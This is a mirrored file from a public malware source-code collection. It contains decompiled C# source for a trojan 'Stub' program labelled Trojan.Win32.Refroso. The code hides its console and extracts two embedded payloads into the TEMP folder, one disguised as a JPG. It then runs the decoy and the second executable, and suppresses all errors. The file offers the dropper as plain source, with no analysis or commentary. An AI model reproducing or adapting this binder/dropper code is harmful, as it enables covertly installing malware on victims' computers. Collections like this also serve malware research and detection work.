mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-03 00:45:28 +00:00
68 lines
3.0 KiB
C#
68 lines
3.0 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Stub.Program
|
|||
|
// Assembly: 6665, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 3EA7F22F-E93D-4997-88DA-D77E5698AEDE
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Refroso.hsun-1e7b6217c18613020d2b48d9d7a44991a8b2402c5d71cf4d2d75d96b3e826999.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
namespace Stub
|
|||
|
{
|
|||
|
internal class Program
|
|||
|
{
|
|||
|
public static FileStream F1Stream;
|
|||
|
public static FileStream F2Stream;
|
|||
|
|
|||
|
[DllImport("kernel32.dll")]
|
|||
|
public static extern bool FreeConsole();
|
|||
|
|
|||
|
private static void Main(string[] args)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Program.FreeConsole();
|
|||
|
bool flag1 = false;
|
|||
|
bool flag2 = true;
|
|||
|
bool flag3 = false;
|
|||
|
bool flag4 = false;
|
|||
|
bool flag5 = true;
|
|||
|
bool flag6 = false;
|
|||
|
Stream manifestResourceStream1 = Assembly.GetExecutingAssembly().GetManifestResourceStream("1.txt");
|
|||
|
byte[] buffer1 = new byte[manifestResourceStream1.Length];
|
|||
|
manifestResourceStream1.Read(buffer1, 0, buffer1.Length);
|
|||
|
manifestResourceStream1.Close();
|
|||
|
Stream manifestResourceStream2 = Assembly.GetExecutingAssembly().GetManifestResourceStream("2.txt");
|
|||
|
byte[] buffer2 = new byte[manifestResourceStream2.Length];
|
|||
|
manifestResourceStream2.Read(buffer2, 0, buffer2.Length);
|
|||
|
Program.F1Stream = !flag2 ? (!flag3 ? new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.exe", FileMode.Create) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.mp3", FileMode.Create)) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.jpg", FileMode.Create);
|
|||
|
Program.F1Stream.Write(buffer1, 0, buffer1.Length);
|
|||
|
Program.F1Stream.Close();
|
|||
|
Program.F1Stream.Dispose();
|
|||
|
Program.F2Stream = !flag4 ? new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\2.exe", FileMode.Create) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\2.bat", FileMode.Create);
|
|||
|
Program.F2Stream.Write(buffer2, 0, buffer2.Length);
|
|||
|
Program.F2Stream.Close();
|
|||
|
Program.F2Stream.Dispose();
|
|||
|
Process process1 = new Process();
|
|||
|
process1.StartInfo.FileName = !flag2 ? (!flag3 ? Environment.GetEnvironmentVariable("TEMP") + "\\1.exe" : Environment.GetEnvironmentVariable("TEMP") + "\\1.mp3") : Environment.GetEnvironmentVariable("TEMP") + "\\1.jpg";
|
|||
|
if (flag6)
|
|||
|
process1.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
|
|||
|
process1.Start();
|
|||
|
if (flag5)
|
|||
|
process1.WaitForExit();
|
|||
|
Process process2 = new Process();
|
|||
|
process2.StartInfo.FileName = !flag4 ? Environment.GetEnvironmentVariable("TEMP") + "\\2.exe" : Environment.GetEnvironmentVariable("TEMP") + "\\2.bat";
|
|||
|
if (flag1)
|
|||
|
process2.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
|
|||
|
process2.Start();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|